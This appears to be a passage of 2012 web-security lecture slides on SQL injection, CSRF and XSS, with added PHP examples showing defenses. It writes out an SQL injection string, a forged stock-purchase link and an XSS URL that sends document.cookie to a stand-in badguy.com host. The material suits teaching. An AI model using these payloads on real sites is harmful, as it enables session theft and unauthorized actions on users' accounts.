security

iPhone Tracker http://petewarden.github.com/iPhoneTracker/

obvious threats: Telnet, FTP, HTTP, MySQL, ...

suphp.org

HTTP/1.x 200 OK
Date: Mon, 23 Apr 2012 13:00:00 EST
Server: Apache/2
X-Powered-By: PHP/5.3.3
Expires: Thu, 23 Apr 1981 13:00:00 EST
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=5899f546557421d38d74b659e5bf384f; path=/
Set-Cookie: secret=12345
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 261
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html

sgc.se

session hijacking: physical access, packet sniffing, session fixation, XSS, ...

SSL

public-key crypto

http://ww.nuitari.de/crypto.html

Diffie-Hellman (DLP)

Radia Perlman


$sql = sprintf("SELECT uid FROM users WHERE username='%s' AND password='%s'", $_POST["username"], $_POST["password"]);

SELECT uid FROM users WHERE username='' AND password='' OR '1'='1'

$sql = sprintf("SELECT uid FROM users WHERE username='%s' AND password='%s'", mysql_real_escape_string($_POST["username"]), mysql_real_escape_string($_POST["password"]));

SELECT uid FROM users WHERE username='' AND password='\' OR \'1\'=\'1'
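The same login written with a parameterized query, as an added example that is not from the original slides; it goes one step past escaping, since mysql_real_escape_string belongs to the old mysql extension that PHP 7 removed. It assumes the pdo_sqlite extension for an in-memory stand-in database, and the function names, the sample account and the hashed password column are hypothetical.

```php
<?php
// Added example, not from the original slides. The table mirrors the
// slides' users(uid, username, password); everything else is hypothetical.

function make_demo_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE users (uid INTEGER PRIMARY KEY, username TEXT UNIQUE, password TEXT)');
    // Constructed sample account; only a salted hash is stored, never the password.
    $stmt = $db->prepare('INSERT INTO users (username, password) VALUES (?, ?)');
    $stmt->execute(['alice', password_hash('correct horse', PASSWORD_DEFAULT)]);
    return $db;
}

// Returns the uid on a successful login, null otherwise.
function login(PDO $db, string $username, string $password): ?int
{
    // The placeholder keeps user input out of the SQL text entirely, so quotes
    // in $username can never change the structure of the query.
    $stmt = $db->prepare('SELECT uid, password FROM users WHERE username = :username');
    $stmt->execute([':username' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return null;   // no such user
    }
    // The password is checked in PHP against the stored hash, not inside SQL.
    return password_verify($password, $row['password']) ? (int) $row['uid'] : null;
}

$db = make_demo_db();
var_dump(login($db, 'alice', 'correct horse'));  // legitimate login
var_dump(login($db, '', "' OR '1'='1"));         // the injection string from the slide
var_dump(login($db, "alice' --", 'anything'));   // comment-style injection in the username
```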

CSRF
1. You log into etrade.com.
2. You then visit a bad guy’s website.
3. Bad guy’s site contains a link to http://etrade.com/buy.php?symbol=INFX.PK
4. You unwittingly buy the penny stock!
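One way the buy.php handler in this scenario could refuse the forged request, as an added example that is not from the original slides: the purchase only runs on a POST that carries a per-session token another site cannot read. The helper names and the csrf_token field are hypothetical, and $session stands in for $_SESSION so the script runs from the command line.

```php
<?php
// Added example, not from the original slides. Helper names and the
// csrf_token field are hypothetical; $session stands in for $_SESSION.

// Creates the per-session token on first use and returns it.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// The legitimate form embeds the token as a hidden field.
function buy_form(array &$session): string
{
    $token = htmlspecialchars(csrf_token($session), ENT_QUOTES, 'UTF-8');
    return '<form method="post" action="buy.php">'
         . '<input type="hidden" name="csrf_token" value="' . $token . '">'
         . '<input name="symbol"><input type="submit" value="Buy">'
         . '</form>';
}

// Decides whether buy.php may act on this request.
function may_buy(string $method, array $post, array $session): bool
{
    // State-changing actions never run on GET, so a bare link cannot trigger them.
    if ($method !== 'POST') {
        return false;
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    // Constant-time comparison against the token stored in the user's session.
    return is_string($supplied) && $expected !== '' && hash_equals($expected, $supplied);
}

$session = [];
echo buy_form($session), "\n";
$token = csrf_token($session);
// Constructed requests: the cross-site GET from step 3, a forged POST
// without the token, and the post from the real form.
var_dump(may_buy('GET', [], $session));
var_dump(may_buy('POST', ['symbol' => 'INFX.PK'], $session));
var_dump(may_buy('POST', ['symbol' => 'INFX.PK', 'csrf_token' => $token], $session));
```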

CSRF

or, really,

http://vulnerable.com/?foo=%3Cscript%3Edocument.location%3D'http%3A%2F%2Fbadguy.com%2Flog.php%3Fcookie%3D'%2Bdocument.cookie%3C%2Fscript%3E

2. vulnerable.com writes value of foo to its body.
3. badguy.com gets your cookies.
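Two defenses against steps 2 and 3, as an added example that is not from the original slides: encode foo before writing it into the body, and give the session cookie the attributes that the Set-Cookie headers shown earlier lack. render_body() and session_cookie_options() are hypothetical names, and the array form of session_set_cookie_params() assumes PHP 7.3 or later.

```php
<?php
// Added example, not from the original slides. render_body() and
// session_cookie_options() are hypothetical helper names.

// Attributes for the session cookie (the array form needs PHP 7.3+).
function session_cookie_options(): array
{
    return [
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,   // only sent over HTTPS, so not exposed to packet sniffing
        'httponly' => true,   // hidden from document.cookie, so injected script cannot read it
        'samesite' => 'Lax',  // withheld from cross-site POSTs and subresource requests
    ];
}

// Writes the value of foo into the page body, encoded for an HTML text context.
function render_body(array $get): string
{
    $foo = $get['foo'] ?? '';
    if (!is_string($foo)) {
        $foo = '';   // foo[]=... arrives as an array; treat it as empty
    }
    return '<p>foo is: '
         . htmlspecialchars($foo, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')
         . '</p>';
}

// Must run before session_start() and before any output is sent.
session_set_cookie_params(session_cookie_options());

// Constructed input: the query string of the slide's URL, parsed the way
// PHP fills $_GET. The markup comes out as inert text, not as a script element.
$query = "foo=%3Cscript%3Edocument.location%3D'http%3A%2F%2Fbadguy.com%2Flog.php%3Fcookie%3D'%2Bdocument.cookie%3C%2Fscript%3E";
parse_str($query, $get);
echo render_body($get), "\n";
```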

SEAS Design Fair Tue 5/1, 11am - 4pm

the end

cs164, Apr 23, 2012
